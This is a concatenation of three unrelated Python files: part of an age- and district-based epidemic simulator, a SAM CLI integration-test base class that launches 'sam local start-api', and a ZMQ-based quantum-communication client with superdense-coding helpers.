self.recovered(self.VenAdult[i])
l = self.VenAdult.pop(i)
size = size - 1
size = len(self.VenKid)
for i in range(size):
if i >= size:
break
if self.people[self.VenKid[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toDie, 1 - self.toDie), k=1)
if st[0] == 1:
lim = int(-1)
self.people[self.VenKid[i]].setLimit(lim)
self.people[self.VenKid[i]].setStatus("Dead")
self.deadKid.append(self.VenKid[i])
l = self.VenKid.pop(i)
size = size - 1
else:
self.people[self.VenKid[i]].setLimit(self.immune_days)
self.people[self.VenKid[i]].setStatus("Cured")
self.cured(self.VenKid[i])
self.recovered(self.VenKid[i])
l = self.VenKid.pop(i)
size = size - 1
size = len(self.VenYoung)
for i in range(size):
if i >= size:
break
if self.people[self.VenYoung[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toDie, 1 - self.toDie), k=1)
if st[0] == 1:
lim = int(-1)
self.people[self.VenYoung[i]].setLimit(lim)
self.people[self.VenYoung[i]].setStatus("Dead")
self.deadYoung.append(self.VenYoung[i])
l = self.VenYoung.pop(i)
size = size - 1
else:
self.people[self.VenYoung[i]].setLimit(self.immune_days)
self.people[self.VenYoung[i]].setStatus("Cured")
self.cured(self.VenYoung[i])
self.recovered(self.VenYoung[i])
l = self.VenYoung.pop(i)
size = size - 1
size = len(self.curedKid)
for i in range(size):
if i >= size:
break
if self.people[self.curedKid[i]].reachedLimit():
self.people[self.curedKid[i]].setStatus("Healthy")
l = self.curedKid.pop(i)
size = size - 1
size = len(self.curedYoung)
for i in range(size):
if i >= size:
break
if self.people[self.curedYoung[i]].reachedLimit():
self.people[self.curedYoung[i]].setStatus("Healthy")
l = self.curedYoung.pop(i)
size = size - 1
size = len(self.curedAdult)
for i in range(size):
if i >= size:
break
if self.people[self.curedAdult[i]].reachedLimit():
self.people[self.curedAdult[i]].setStatus("Healthy")
l = self.curedAdult.pop(i)
size = size - 1
    # ---- Completed function definition of update() ----#
# ---- Set daily records ----#
#[[[kid],[young],[adult],[total]],[[kid],[young],[adult],[total]]]
# district1 district2
#array[dist][0].append(tempKid)
def record(self):
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
if len(self.asympKid) is 0:
self.asympKidNum.append(0)
else:
self.asympKidNum.append(len(self.asympKid))
for i in range(len(self.asympKid)):
# if(self.people[self.asympKid[i]].getDistrict()==1):
# print(" 681 : here ")
kid[self.people[self.asympKid[i]].getDistrict()] = kid[self.people[self.asympKid[i]].getDistrict()] + 1
if len(self.asympYoung) is 0:
self.asympYoungNum.append(0)
else:
self.asympYoungNum.append(len(self.asympYoung))
for i in range(len(self.asympYoung)):
young[self.people[self.asympYoung[i]].getDistrict()] = young[self.people[self.asympYoung[i]].getDistrict()] + 1
if len(self.asympAdult) is 0:
self.asympAdultNum.append(0)
else:
self.asympAdultNum.append(len(self.asympAdult))
for i in range(len(self.asympAdult)):
adult[self.people[self.asympAdult[i]].getDistrict()] = adult[self.people[self.asympAdult[i]].getDistrict()] + 1
#self.distAsymp = [[[], [], [], []]] * self.dists
for i in range(self.dists):
self.distAsymp[i][0].append(kid[i])
self.distAsymp[i][1].append(young[i])
self.distAsymp[i][2].append(adult[i])
self.distAsymp[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if (len(self.sympKid) is 0):
self.sympKidNum.append(0)
else:
self.sympKidNum.append(len(self.sympKid))
for i in range(len(self.sympKid)):
kid[self.people[self.sympKid[i]].getDistrict()] = kid[self.people[self.sympKid[i]].getDistrict()] + 1
if len(self.sympYoung) is 0:
self.sympYoungNum.append(0)
else:
self.sympYoungNum.append(len(self.sympYoung))
for i in range(len(self.sympYoung)):
young[self.people[self.sympYoung[i]].getDistrict()] = young[self.people[self.sympYoung[i]].getDistrict()] + 1
if len(self.sympAdult) is 0:
self.sympAdultNum.append(0)
else:
self.sympAdultNum.append(len(self.sympAdult))
for i in range(len(self.sympAdult)):
adult[self.people[self.sympAdult[i]].getDistrict()] = adult[self.people[self.sympAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distSymp[i][0].append(kid[i])
self.distSymp[i][1].append(young[i])
self.distSymp[i][2].append(adult[i])
self.distSymp[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
        if len(self.admittedKid) == 0:
            self.admittedKidNum.append(0)
        else:
            self.admittedKidNum.append(len(self.admittedKid))
        for i in range(len(self.admittedKid)):
            kid[self.people[self.admittedKid[i]].getDistrict()] = kid[self.people[self.admittedKid[i]].getDistrict()] + 1
if len(self.admittedYoung) is 0:
self.admittedYoungNum.append(0)
else:
self.admittedYoungNum.append(len(self.admittedYoung))
for i in range(len(self.admittedYoung)):
young[self.people[self.admittedYoung[i]].getDistrict()] = young[self.people[self.admittedYoung[i]].getDistrict()] + 1
if len(self.admittedAdult) is 0:
self.admittedAdultNum.append(0)
else:
self.admittedAdultNum.append(len(self.admittedAdult))
for i in range(len(self.admittedAdult)):
adult[self.people[self.admittedAdult[i]].getDistrict()] = adult[self.people[self.admittedAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distAdmitted[i][0].append(kid[i])
self.distAdmitted[i][1].append(young[i])
self.distAdmitted[i][2].append(adult[i])
self.distAdmitted[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if len(self.ICUKid) is 0:
self.ICUKidNum.append(0)
else:
self.ICUKidNum.append(len(self.ICUKid))
for i in range(len(self.ICUKid)):
kid[self.people[self.ICUKid[i]].getDistrict()] = kid[self.people[self.ICUKid[i]].getDistrict()] + 1
if len(self.ICUYoung) is 0:
self.ICUYoungNum.append(0)
else:
self.ICUYoungNum.append(len(self.ICUYoung))
for i in range(len(self.ICUYoung)):
young[self.people[self.ICUYoung[i]].getDistrict()] = young[self.people[self.ICUYoung[i]].getDistrict()] + 1
if len(self.ICUAdult) is 0:
self.ICUAdultNum.append(0)
else:
self.ICUAdultNum.append(len(self.ICUAdult))
for i in range(len(self.ICUAdult)):
adult[self.people[self.ICUAdult[i]].getDistrict()] = adult[self.people[self.ICUAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distICU[i][0].append(kid[i])
self.distICU[i][1].append(young[i])
self.distICU[i][2].append(adult[i])
self.distICU[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if len(self.VenKid) is 0:
self.VenKidNum.append(0)
else:
self.VenKidNum.append(len(self.VenKid))
for i in range(len(self.VenKid)):
kid[self.people[self.VenKid[i]].getDistrict()] = kid[self.people[self.VenKid[i]].getDistrict()] + 1
if len(self.VenYoung) is 0:
self.VenYoungNum.append(0)
else:
self.VenYoungNum.append(len(self.VenYoung))
for i in range(len(self.VenYoung)):
young[self.people[self.VenYoung[i]].getDistrict()] = young[self.people[self.VenYoung[i]].getDistrict()] + 1
if len(self.VenAdult) is 0:
self.VenAdultNum.append(0)
else:
self.VenAdultNum.append(len(self.VenAdult))
for i in range(len(self.VenAdult)):
adult[self.people[self.VenAdult[i]].getDistrict()] = adult[self.people[self.VenAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distVen[i][0].append(kid[i])
self.distVen[i][1].append(young[i])
self.distVen[i][2].append(adult[i])
self.distVen[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
adult = [0]*self.dists
young = [0]*self.dists
total = [0]*self.dists
if len(self.deadKid) is 0:
self.deadKidNum.append(0)
else:
self.deadKidNum.append(len(self.deadKid))
for i in range(len(self.deadKid)):
kid[self.people[self.deadKid[i]].getDistrict()] = kid[self.people[self.deadKid[i]].getDistrict()] + 1
if len(self.deadYoung) is 0:
self.deadYoungNum.append(0)
else:
self.deadYoungNum.append(len(self.deadYoung))
for i in range(len(self.deadYoung)):
young[self.people[self.deadYoung[i]].getDistrict()] = young[self.people[self.deadYoung[i]].getDistrict()] + 1
if len(self.deadAdult) is 0:
self.deadAdultNum.append(0)
else:
self.deadAdultNum.append(len(self.deadAdult))
for i in range(len(self.deadAdult)):
adult[self.people[self.deadAdult[i]].getDistrict()] = adult[self.people[self.deadAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distDead[i][0].append(kid[i])
self.distDead[i][1].append(young[i])
self.distDead[i][2].append(adult[i])
self.distDead[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
adult = [0]*self.dists
young = [0]*self.dists
total = [0]*self.dists
if len(self.curedKid) is 0:
self.curedKidNum.append(0)
else:
self.curedKidNum.append(len(self.curedKid))
for i in range(len(self.curedKid)):
kid[self.people[self.curedKid[i]].getDistrict()] = kid[self.people[self.curedKid[i]].getDistrict()] + 1
if len(self.curedYoung) is 0:
self.curedYoungNum.append(0)
else:
self.curedYoungNum.append(len(self.curedYoung))
for i in range(len(self.curedYoung)):
young[self.people[self.curedYoung[i]].getDistrict()] = young[self.people[self.curedYoung[i]].getDistrict()] + 1
if len(self.curedAdult) is 0:
self.curedAdultNum.append(0)
else:
self.curedAdultNum.append(len(self.curedAdult))
for i in range(len(self.curedAdult)):
adult[self.people[self.curedAdult[i]].getDistrict()] = adult[self.people[self.curedAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distCured[i][0].append(kid[i])
self.distCured[i][1].append(young[i])
self.distCured[i][2].append(adult[i])
self.distCured[i][3].append(kid[i] + young[i] + adult[i])
kid = [0] * self.dists
adult = [0] * self.dists
young = [0] * self.dists
total = [0] * self.dists
if len(self.recoveredKid) is 0:
self.recoveredKidNum.append(0)
else:
self.recoveredKidNum.append(len(self.recoveredKid))
for i in range(len(self.recoveredKid)):
kid[self.people[self.recoveredKid[i]].getDistrict()] = kid[self.people[self.recoveredKid[i]].getDistrict()] + 1
if len(self.recoveredYoung) is 0:
self.recoveredYoungNum.append(0)
else:
self.recoveredYoungNum.append(len(self.recoveredYoung))
for i in range(len(self.recoveredYoung)):
young[self.people[self.recoveredYoung[i]].getDistrict()] = young[self.people[self.recoveredYoung[i]].getDistrict()] + 1
if len(self.recoveredAdult) == 0:
self.recoveredAdultNum.append(0)
else:
self.recoveredAdultNum.append(len(self.recoveredAdult))
for i in range(len(self.recoveredAdult)):
adult[self.people[self.recoveredAdult[i]].getDistrict()] = adult[self.people[self.recoveredAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distRecovered[i][0].append(kid[i])
self.distRecovered[i][1].append(young[i])
self.distRecovered[i][2].append(adult[i])
self.distRecovered[i][3].append(kid[i] + young[i] + adult[i])
kid = [0] * self.dists
adult = [0] * self.dists
young = [0] * self.dists
total = [0] * self.dists
if len(self.intInfectKid) == 0:
self.intInfectKidNum.append(0)
else:
self.intInfectKidNum.append(len(self.intInfectKid))
for i in range(len(self.intInfectKid)):
kid[self.people[self.intInfectKid[i]].getDistrict()] = kid[self.people[self.intInfectKid[i]].getDistrict()] + 1
if len(self.intInfectYoung) is 0:
self.intInfectYoungNum.append(0)
else:
self.intInfectYoungNum.append(len(self.intInfectYoung))
for i in range(len(self.intInfectYoung)):
young[self.people[self.intInfectYoung[i]].getDistrict()] = young[self.people[self.intInfectYoung[i]].getDistrict()] + 1
if len(self.intInfectAdult) == 0:
self.intInfectAdultNum.append(0)
else:
self.intInfectAdultNum.append(len(self.intInfectAdult))
for i in range(len(self.intInfectAdult)):
adult[self.people[self.intInfectAdult[i]].getDistrict()] = adult[self.people[self.intInfectAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distIntInfect[i][0].append(kid[i])
self.distIntInfect[i][1].append(young[i])
self.distIntInfect[i][2].append(adult[i])
self.distIntInfect[i][3].append(kid[i] + young[i] + adult[i])
kid = [0] * self.dists
adult = [0] * self.dists
young = [0] * self.dists
total = [0] * self.dists
if len(self.nonintInfectKid) == 0:
self.nonintInfectKidNum.append(0)
else:
self.nonintInfectKidNum.append(len(self.nonintInfectKid))
for i in range(len(self.nonintInfectKid)):
kid[self.people[self.nonintInfectKid[i]].getDistrict()] = kid[self.people[self.nonintInfectKid[i]].getDistrict()] + 1
if len(self.nonintInfectYoung) == 0:
self.nonintInfectYoungNum.append(0)
else:
self.nonintInfectYoungNum.append(len(self.nonintInfectYoung))
for i in range(len(self.nonintInfectYoung)):
young[self.people[self.nonintInfectYoung[i]].getDistrict()] = young[self.people[self.nonintInfectYoung[i]].getDistrict()] + 1
if len(self.nonintInfectAdult) == 0:
self.nonintInfectAdultNum.append(0)
else:
self.nonintInfectAdultNum.append(len(self.nonintInfectAdult))
for i in range(len(self.nonintInfectAdult)):
adult[self.people[self.nonintInfectAdult[i]].getDistrict()] = adult[self.people[self.nonintInfectAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distNonintInfect[i][0].append(kid[i])
self.distNonintInfect[i][1].append(young[i])
self.distNonintInfect[i][2].append(adult[i])
self.distNonintInfect[i][3].append(kid[i] + young[i] + adult[i])
self.asympNum.append(len(self.asympKid) + len(self.asympYoung) + len(self.asympAdult))
self.sympNum.append(len(self.sympKid) + len(self.sympYoung) + len(self.sympAdult))
self.admittedNum.append(len(self.admittedKid) + len(self.admittedYoung) + len(self.admittedAdult))
self.ICUNum.append(len(self.ICUKid) + len(self.ICUYoung) + len(self.ICUAdult))
self.venNum.append(len(self.VenKid) + len(self.VenYoung) + len(self.VenAdult))
self.deadNum.append(len(self.deadKid) + len(self.deadYoung) + len(self.deadAdult))
self.curedNum.append(len(self.curedKid) + len(self.curedYoung) + len(self.curedAdult))
self.recoveredNum.append(len(self.recoveredKid) + len(self.recoveredYoung) + len(self.recoveredAdult))
self.intInfectNum.append(len(self.intInfectKid) + len(self.intInfectYoung) + len(self.intInfectAdult))
self.nonintInfectNum.append(len(self.nonintInfectKid) + len(self.nonintInfectYoung) + len(self.nonintInfectAdult))
# ---- Completed function definition of record() ---#
# ---- Increment the number of days ----#
def anotherDay(self):
for i in range(len(self.asympKid)):
self.people[self.asympKid[i]].increment()
# print("Simulator/anotherday : Incremented " + self.asympKid[i].days)
for i in range(len(self.asympYoung)):
self.people[self.asympYoung[i]].increment()
# print("Simulator/anotherday : Incremented " + self.asympYoung[i].days)
for i in range(len(self.asympAdult)):
self.people[self.asympAdult[i]].increment()
# print("Simulator/anotherday : Incremented " + str(self.people[self.asympAdult[i]].days))
for i in range(len(self.sympKid)):
self.people[self.sympKid[i]].increment()
for i in range(len(self.sympYoung)):
self.people[self.sympYoung[i]].increment()
for i in range(len(self.sympAdult)):
self.people[self.sympAdult[i]].increment()
for i in range(len(self.admittedKid)):
self.people[self.admittedKid[i]].increment()
for i in range(len(self.admittedYoung)):
self.people[self.admittedYoung[i]].increment()
for i in range(len(self.admittedAdult)):
self.people[self.admittedAdult[i]].increment()
for i in range(len(self.ICUKid)):
self.people[self.ICUKid[i]].increment()
for i in range(len(self.ICUYoung)):
self.people[self.ICUYoung[i]].increment()
for i in range(len(self.ICUAdult)):
self.people[self.ICUAdult[i]].increment()
for i in range(len(self.VenKid)):
self.people[self.VenKid[i]].increment()
for i in range(len(self.VenYoung)):
self.people[self.VenYoung[i]].increment()
for i in range(len(self.VenAdult)):
self.people[self.VenAdult[i]].increment()
for i in range(len(self.deadAdult)):
self.people[self.deadAdult[i]].increment()
for i in range(len(self.deadYoung)):
self.people[self.deadYoung[i]].increment()
for i in range(len(self.deadKid)):
self.people[self.deadKid[i]].increment()
for i in range(len(self.curedAdult)):
self.people[self.curedAdult[i]].increment()
for i in range(len(self.curedYoung)):
self.people[self.curedYoung[i]].increment()
for i in range(len(self.curedKid)):
self.people[self.curedKid[i]].increment()
self.update()
# ---- Completed function definition of anotherDay() ----#
def firstQuarter(self):
lim = int(len(self.people) / 4)
self.writer.log("From first " +str(lim))
for i in range(lim):
self.setclosest(i)
def secondQuarter(self):
lim1 = int(len(self.people)/ 4)
lim2 = int(len(self.people) / 2)
self.writer.log("From second " + str(lim1)+ " : "+str(lim2))
for i in range(lim1, lim2):
self.setclosest(i)
def thirdQuarter(self):
lim1 = int(len(self.people) / 2)
lim2 = int((3*len(self.people)) / 4)
self.writer.log("From third " + str(lim1) + " : " + str(lim2))
for i in range(lim1, lim2):
self.setclosest(i)
def fourthQuarter(self):
lim = int(3 *len(self.people) / 4)
self.writer.log("From fourth " + str(lim) + " : " + str(len(self.people)))
for i in range(lim, len(self.people)):
self.setclosest(i)
def clear(self):
# one [kid, young, adult, total] time series per district (11 districts assumed, matching the range(self.dists) loops in record())
self.distAsymp = [[[], [], [], []] for _ in range(11)]
self.distSymp = [[[], [], [], []] for _ in range(11)]
self.distAdmitted = [[[], [], [], []] for _ in range(11)]
self.distCured = [[[], [], [], []] for _ in range(11)]
self.distRecovered = [[[], [], [], []] for _ in range(11)]
self.distICU = [[[], [], [], []] for _ in range(11)]
self.distVen = [[[], [], [], []] for _ in range(11)]
self.distDead = [[[], [], [], []] for _ in range(11)]
self.distIntInfect = [[[], [], [], []] for _ in range(11)]
self.distNonintInfect = [[[], [], [], []] for _ in range(11)]
self.pr = person()
self.curedKid = []
self.curedYoung = []
self.curedAdult = []
self.recoveredKid = []
self.recoveredYoung = []
self.recoveredAdult = []
self.intInfectKid = []
self.intInfectYoung = []
self.intInfectAdult = []
self.nonintInfectKid = []
self.nonintInfectYoung = []
self.nonintInfectAdult = []
self.asympKid = []
self.asympYoung = []
self.asympAdult = []
self.admittedKid = []
self.admittedYoung = []
self.admittedAdult = []
self.ICUKid = []
self.ICUYoung = []
self.ICUAdult = []
self.VenKid = []
self.VenYoung = []
self.VenAdult = []
self.deadKid = []
self.deadYoung = []
self.deadAdult = []
self.sympYoung = []
self.sympKid = []
self.sympAdult = []
self.asympKidNum = []
self.asympYoungNum = []
self.asympAdultNum = []
self.admittedKidNum = []
self.admittedYoungNum = []
self.admittedAdultNum = []
self.ICUKidNum = []
self.ICUYoungNum = []
self.ICUAdultNum = []
self.VenKidNum = []
self.VenYoungNum = []
self.VenAdultNum = []
self.sympYoungNum = []
self.sympKidNum = []
self.sympAdultNum = []
self.deadYoungNum = []
self.deadKidNum = []
self.deadAdultNum = []
self.curedYoungNum = []
self.curedKidNum = []
self.recoveredAdultNum = []
self.recoveredYoungNum = []
self.recoveredKidNum = []
self.intInfectKidNum = []
self.intInfectYoungNum = []
self.intInfectAdultNum = []
self.nonintInfectKidNum = []
self.nonintInfectYoungNum = []
self.nonintInfectAdultNum = []
self.curedAdultNum = []
self.asympNum = []
self.sympNum = []
self.admittedNum = []
self.venNum = []
self.ICUNum = []
self.deadNum = []
self.curedNum = []
self.recoveredNum = []
self.intInfectNum = []
self.nonintInfectNum = []
self.mask_dist_percent = 0
self.immune_days = 0
self.close_circle = 0
for per in self.people:
per.clear()
# ---- Pretty much the most important function. It performs the simulation ----#
def simulate(self):
# ---- Bringing in the data of the people. It would be stored in people[] ---- #
self.people = self.dataPool.getPeople()
self.writer.log("Simulator/sim : " + str(len(self.people)) + " people included in the simulation ")
# ---- Data had been brought in ----
# ---- Finding the closest people to each person, and storing their ids in closest[] ----
m = 0
counter = 1
for i in range(len(self.people)):
self.setcontacts(i)
m = m+1
if(m >= 25000):
print("Finish setting the closest of "+str(m*counter)+" people")
m = 0
counter = counter+1
t1 = threading.Thread(target=self.firstQuarter, args=())
t2 = threading.Thread(target=self.secondQuarter, args=())
t3 = threading.Thread(target=self.thirdQuarter, args=())
t4 = threading.Thread(target=self.fourthQuarter, args=())
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t2.join()
t3.join()
t4.join()
self.writer.log("Simulator/sim : Proximate people of each person set successfully")
# ---- Closest people of each person had been set ---- #
self.writer.log("\nSimulator/sim : Starting simulator")
for case in range(6):
if case == 0:
# print("Woah")
self.mask_dist_percent = 100
self.immune_days = 90
elif case == 1:
self.mask_dist_percent = 75
self.immune_days = 90
elif case == 2:
self.mask_dist_percent = 50
self.immune_days = 90
elif case == 3:
self.mask_dist_percent = 100
self.immune_days = 180
elif case == 4:
self.mask_dist_percent = 75
self.immune_days = 180
elif case == 5:
self.mask_dist_percent = 50
self.immune_days = 180
self.writer.log("\tRunning case "+str(case+1))
print("\tRunning case "+str(case+1))
self.asymp(0) # Just one person is infected initially
self.people[0].setStatus("Asymptamatic")
self.people[0].setLimit(14)
dist_mark = self.dataPool.dist_mark
left = len(dist_mark)
self.writer.log("We introduce one new carrier in each district every week.")
for day in range(self.days):
flag =True
print("Simulating day: " + str(int(day)))
if (day % 7 == 0) and (day < 300):
for i in range(len(dist_mark)):
if dist_mark[i] == dist_mark[-1]:
if(len(dist_mark)!=1):
break
if(left==1):
end = len(self.people)-1
else:
end = dist_mark[i+1]-1
while (flag):
left = left -1
ran = random.randint(dist_mark[i],end)
if (self.people[ran].isHealthy()):
self.asymp(ran)
self.people[ran].setStatus("Asymptamatic")
self.people[ran].setLimit(14)
print("\t\tIntroduced new carrier on day : " + str(day))
flag = False
for i in range(len(self.people)):
self.presentday = int(day)
self.coronaSpree(i)
self.anotherDay()
self.record()
self.writer.createRecords(self, case)
self.clear()
self.writer.log("\nSimulator/sim : Completed the simulation of " + str(len(self.people)) + " people over " + str(self.days+1) + " days.")
|
start_api_integ_base.py
|
import shutil
import uuid
from typing import Optional, Dict
from unittest import TestCase, skipIf
import threading
from subprocess import Popen
import time
import os
import random
from pathlib import Path
from tests.testing_utils import SKIP_DOCKER_MESSAGE, SKIP_DOCKER_TESTS, run_command
@skipIf(SKIP_DOCKER_TESTS, SKIP_DOCKER_MESSAGE)
class StartApiIntegBaseClass(TestCase):
template: Optional[str] = None
container_mode: Optional[str] = None
parameter_overrides: Optional[Dict[str, str]] = None
binary_data_file: Optional[str] = None
integration_dir = str(Path(__file__).resolve().parents[2])
build_before_invoke = False
build_overrides: Optional[Dict[str, str]] = None
@classmethod
def setUpClass(cls):
# This is the directory for tests/integration which will be used to find the testdata
# files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
if cls.build_before_invoke:
cls.build()
cls.port = str(StartApiIntegBaseClass.random_port())
cls.thread = threading.Thread(target=cls.start_api())
cls.thread.setDaemon(True)
cls.thread.start()
@classmethod
def build(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "build"]
if cls.build_overrides:
overrides_arg = " ".join(
["ParameterKey={},ParameterValue={}".format(key, value) for key, value in cls.build_overrides.items()]
)
command_list += ["--parameter-overrides", overrides_arg]
working_dir = str(Path(cls.template).resolve().parents[0])
run_command(command_list, cwd=working_dir)
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "local", "start-api", "-t", cls.template, "-p", cls.port]
if cls.container_mode:
command_list += ["--warm-containers", cls.container_mode]
if cls.parameter_overrides:
command_list += ["--parameter-overrides", cls._make_parameter_override_arg(cls.parameter_overrides)]
cls.start_api_process = Popen(command_list)
# we need to wait some time for start-api to start, hence the sleep
time.sleep(5)
@classmethod
def _make_parameter_override_arg(cls, overrides):
return " ".join(["ParameterKey={},ParameterValue={}".format(key, value) for key, value in overrides.items()])
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.start_api_process.kill()
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
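# Usage sketch (illustrative, not part of the test suite): concrete test classes point
# template_path at a testdata template and the base class starts "sam local start-api"
# once per class on the random port stored in cls.port. The path below is hypothetical.
#
# class TestExampleApi(StartApiIntegBaseClass):
#     template_path = "/testdata/start_api/template.yaml"  # hypothetical testdata path
#
#     def test_root_returns_200(self):
#         import requests
#         response = requests.get(f"http://127.0.0.1:{self.port}/", timeout=300)
#         self.assertEqual(response.status_code, 200)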
class WatchWarmContainersIntegBaseClass(StartApiIntegBaseClass):
temp_path: Optional[str] = None
template_path: Optional[str] = None
code_path: Optional[str] = None
docker_file_path: Optional[str] = None
@classmethod
def setUpClass(cls):
cls.temp_path = str(uuid.uuid4()).replace("-", "")[:10]
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
os.mkdir(working_dir)
cls.template_path = f"/{cls.temp_path}/template.yaml"
cls.code_path = f"/{cls.temp_path}/main.py"
cls.docker_file_path = f"/{cls.temp_path}/Dockerfile"
if cls.template_content:
cls._write_file_content(cls.template_path, cls.template_content)
if cls.code_content:
cls._write_file_content(cls.code_path, cls.code_content)
if cls.docker_file_content:
cls._write_file_content(cls.docker_file_path, cls.docker_file_content)
super().setUpClass()
@classmethod
def _write_file_content(cls, path, content):
with open(cls.integration_dir + path, "w") as f:
f.write(content)
@classmethod
def tearDownClass(cls):
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
super().tearDownClass()
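# Usage sketch for the warm-containers variant (illustrative only): subclasses supply the
# file bodies that setUpClass writes into a throwaway working directory before delegating
# to StartApiIntegBaseClass. The attribute values below are placeholders.
#
# class TestWatchExample(WatchWarmContainersIntegBaseClass):
#     template_content = "..."      # SAM template body written to template.yaml
#     code_content = "..."          # handler source written to main.py
#     docker_file_content = "..."   # Dockerfile body for an image-based function
#     container_mode = "EAGER"      # forwarded to --warm-containers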
|
b_qim_client.py
|
import orsoqs
import json
import signal
import sys
import threading
import matplotlib.pyplot as plt
import numpy as np
import zmq
try:
from Queue import Queue
except ImportError:
from queue import Queue
class qim_client:
def sdc_encode_char(self, c):
'''
Encode a character into SDC flags.
'''
c = ord(c)
ret = str((c & 0x03) >> 0) + \
str((c & 0x0c) >> 2) + \
str((c & 0x30) >> 4) + \
str((c & 0xc0) >> 6)
return ret
def sdc_encode_str(self, s):
'''
Encode a string of characters into SDC flags.
'''
return ''.join([self.sdc_encode_char(c) for c in str(s)])
def sdc_decode_char(self, b):
'''
Decode a character from SDC flags.
'''
if len(b) != 4:
raise ValueError('Length of b not 4')
b = [int(x) for x in b]
return chr((b[0] << 0) \
+ (b[1] << 2) \
+ (b[2] << 4) \
+ (b[3] << 6)
)
def sdc_decode_str(self, s):
'''
Decode a string from SDC flags.
'''
if len(s) % 4 != 0:
raise ValueError('Length of s not multiple of 4')
ret = ''
for i in range(0, len(s), 4):
ret += self.sdc_decode_char(s[i:i+4])
return ret
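# Round-trip example for the SDC helpers above: each character becomes four base-4 flags,
# two bits per flag, least-significant pair first.
#   sdc_encode_char('A') -> '1001'   (ord('A') == 65 == 0b01000001)
#   sdc_decode_str('1001') -> 'A'
# so sdc_decode_str(sdc_encode_str(s)) == s for any 8-bit string s.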
def get_basis(self):
if(self.basisLoc == 7):
self.basisLoc = 0
self.basis = ord(self.bases.read(1))
ret = (self.basis >> self.basisLoc) & 1
self.basisLoc += 1
return ret
def listen_cb(self, msg):
'''
A really simple callback function that saves what is received.
'''
if msg[-1] == '\0':
msg = msg[:-1]
response = json.loads(msg)
if 'error' in response and response['error'] == True:
raise Exception('Failure in listen_cb()')
elif 'result' in response:
meas = int(response['result'])
ber = 0
bas = 'x'
if meas == 1 or meas == 2:
ber = 1
if self.get_basis() == 1:
bas = 'z'
self.ber.put([bas, ber])
return '_'
else:
raise Exception('Failure in listen_cb()')
def plotter(self):
datal = 25
windowl = 100
xdata = [0]*datal
zdata = [0]*datal
xwindow = [0]*windowl
xewindow = [0]*windowl
zwindow = [0]*windowl
zewindow = [0]*windowl
plt.ion()
x = range(1,windowl+1)
y = [0]*windowl
fig, ((ax, az), (axe, aze)) = plt.subplots(2, 2, figsize=(10,5))
ax.set_ylim([0, 1])
az.set_ylim([0, 1])
axe.set_ylim([0, 1])
aze.set_ylim([0, 1])
line1, = ax.plot(x, y, 'b.')
line2, = az.plot(x, y, 'b.')
line1e, = axe.plot(x, y, 'b.')
line2e, = aze.plot(x, y, 'b.')
# this is very inefficient
while True:
# ('x', 'val')
item = self.ber.get()
if item[0] == 'x':
xdata = xdata[1:] + [item[1]]
xwindow = xwindow[1:] + [np.mean(xdata)]
line1.set_ydata(xwindow)
xewindow = xewindow[1:] + [np.std(xdata)]
line1e.set_ydata(xewindow)
zwindow = zwindow[1:] + [-100]
line2.set_ydata(zwindow)
zewindow = zewindow[1:] + [-100]
line2e.set_ydata(zewindow)
else:
zdata = zdata[1:] + [item[1]]
zwindow = zwindow[1:] + [np.mean(zdata)]
line2.set_ydata(zwindow)
zewindow = zewindow[1:] + [np.std(zdata)]
line2e.set_ydata(zewindow)
xwindow = xwindow[1:] + [-100]
line1.set_ydata(xwindow)
xewindow = xewindow[1:] + [-100]
line1e.set_ydata(xewindow)
fig.canvas.draw()
def __init__(self, receiveCb, afIEndpoint, afOEndpoint, basesFile):
signal.signal(signal.SIGINT, self.signal_handler)
self.zcontext = zmq.Context(1)
self.orclient = orsoqs.create_client()
self.osocket = orsoqs.connect(self.orclient, afIEndpoint, orsoqs.CON_PUSH)
self.isocket = orsoqs.connect(self.orclient, afOEndpoint, orsoqs.CON_WAIT)
self.isocket.set_proc_callback(self.listen_cb)
self.bases = open(basesFile)
self.basisLoc = 0
self.basis = ord(self.bases.read(1))
self.ber = Queue()
self.plotter_thread = threading.Thread(target=self.plotter)
self.plotter_thread.start()
def signal_handler(self, signum, frame):
pass
def send(self, address, msg):
'''
Send a message to a given address, where address is a numerical IP in
network byte order.
'''
request = {
'action' : 'push',
'method' : 'tx',
'parameters' : [
int(address),
int(14450),
''.join([self.sdc_encode_str(msg)])
]
}
request = json.dumps(request)
# We have automatic Python garbage collection from SWIG
request = orsoqs.create_msg(request, len(request)+1)
